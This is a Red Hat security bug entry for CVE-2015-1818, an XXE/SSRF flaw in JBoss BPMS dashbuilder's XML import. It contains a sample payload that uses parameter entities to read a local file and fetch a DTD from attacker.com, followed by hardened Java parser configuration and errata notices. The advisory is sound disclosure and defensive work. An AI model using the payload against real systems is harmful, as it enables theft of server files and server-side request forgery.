Bug 1201714 (CVE-2015-1818)

Summary: CVE-2015-1818 dashbuilder: XXE/SSRF vulnerability
Product: [Other] Security Response
Reporter: Martin Prpič <mprpic>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
Severity: medium
Priority: medium
Version: unspecified
CC: alazarot, aszczucz, chazlett, etirelli, jcoleman, lpetrovi, mbaluch, mwinkler, nwallace, rrajasek, rzhang, tkirby
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Doc Type: Bug Fix
Doc Text:
A flaw was found in the dashbuilder import facility: the DocumentBuilders instantiated in org.jboss.dashboard.export.ImportManagerImpl did not disable external entities. This could allow an attacker to perform a variety of XML External Entity (XXE) and Server-Side Request Forgery (SSRF) attacks.
Story Points: ---
Last Closed: 2019-06-08 02:39:34 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
Category: ---
oVirt Team: ---
Cloudforms Team: ---
Bug Depends On: 1211315, 1211316, 1211317, 1211318, 1211319, 1211320, 1246170
Bug Blocks: 1201717, 1244364, 1244365

Description Martin Prpič 2015-03-13 10:25:08 UTC
A flaw was found in the dashbuilder import facility of JBoss BPMS 6: the DocumentBuilders instantiated in org.jboss.dashboard.export.ImportManagerImpl do not disable external entities.

This could allow an attacker to perform a variety of XXE/SSRF attacks. Exfiltrating data using a general entity attack is not obviously possible, but standard parameter entity exfiltration techniques will work.

For example, importing the following file:

<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///tmp/loot.txt">
<!ENTITY % dtd SYSTEM "http://attacker.com/send.dtd">
%dtd;
%send;
]]>
<doc>bar</doc>

causes send.dtd to be retrieved, and loot.txt to be exfiltrated if send.dtd contains the appropriate content.

Acknowledgements:

Red Hat would like to thank David Jorm of IIX Product Security for reporting this issue.
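The root cause described above is a DocumentBuilder created with default settings, which resolves external general and parameter entities and fetches external DTDs. The following is an added illustration, written for this page and not the dashbuilder project's own fix, of how an import facility would configure DocumentBuilderFactory so that the DOCTYPE in the report's sample file is rejected before any entity is resolved. The class name HardenedImportParser and the sample documents in main are constructed for this example; the feature and property names are the standard Xerces and JAXP 1.5 identifiers.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

/** Hypothetical hardened parser setup for an XML import facility (example code, not dashbuilder's). */
public class HardenedImportParser {

    /** Build a DocumentBuilder that never resolves external entities or external DTDs. */
    public static DocumentBuilder newHardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();

        // Strongest control: refuse any DOCTYPE at all, so no entity declaration
        // (general or parameter) is ever processed. The sample file in this report
        // fails here with a SAXParseException before %dtd; is ever looked at.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

        // Defence in depth, for parsers or configurations where a DOCTYPE must be
        // tolerated: do not resolve external general or parameter entities and do
        // not fetch external DTDs (this is the SSRF vector in the report).
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);

        try {
            // JAXP 1.5 properties: an empty string denies every access protocol.
            dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
            dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        } catch (IllegalArgumentException e) {
            // Older JAXP implementations do not know these properties;
            // the SAX/Xerces features set above still apply.
        }
        return dbf.newDocumentBuilder();
    }

    /**
     * Parse untrusted import XML with the hardened builder.
     * Returns the parsed Document, or null when the parser rejects the input
     * (DOCTYPE present, or not well-formed XML).
     */
    public static Document parseImport(String xml) throws ParserConfigurationException {
        try {
            return newHardenedBuilder().parse(new InputSource(new StringReader(xml)));
        } catch (SAXException | IOException e) {
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample inputs for this example: a plain export and one
        // carrying a (harmless, internal-only) DOCTYPE declaration.
        String plain = "<workspace><name>demo</name></workspace>";
        String withDoctype = "<!DOCTYPE workspace [<!ENTITY e \"x\">]><workspace>&e;</workspace>";

        System.out.println("plain import accepted: " + (parseImport(plain) != null));
        System.out.println("DOCTYPE import accepted: " + (parseImport(withDoctype) != null));
    }
}
```

With disallow-doctype-decl enabled, any import containing a DOCTYPE is rejected outright, which is the right default for a format that does not need one. If a legitimate import format does require a DTD, drop only that first feature and keep the remaining settings, so that the parser still refuses to resolve external general entities, parameter entities and external DTD references; a rejected import should be logged with the source user and file name, since a DOCTYPE in an export file is itself a useful detection signal.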

Comment 4 errata-xmlrpc 2015-08-03 19:41:16 UTC
This issue has been addressed in the following products:

  JBoss BPM Suite 6.1.2

Via RHSA-2015:1539 https://rhn.redhat.com/errata/RHSA-2015-1539.html

Comment 5 errata-xmlrpc 2015-09-02 16:28:20 UTC
This issue has been addressed in the following products:

  JBoss Data Virtualization 6.1.0

Via RHSA-2015:1704 https://rhn.redhat.com/errata/RHSA-2015-1704.html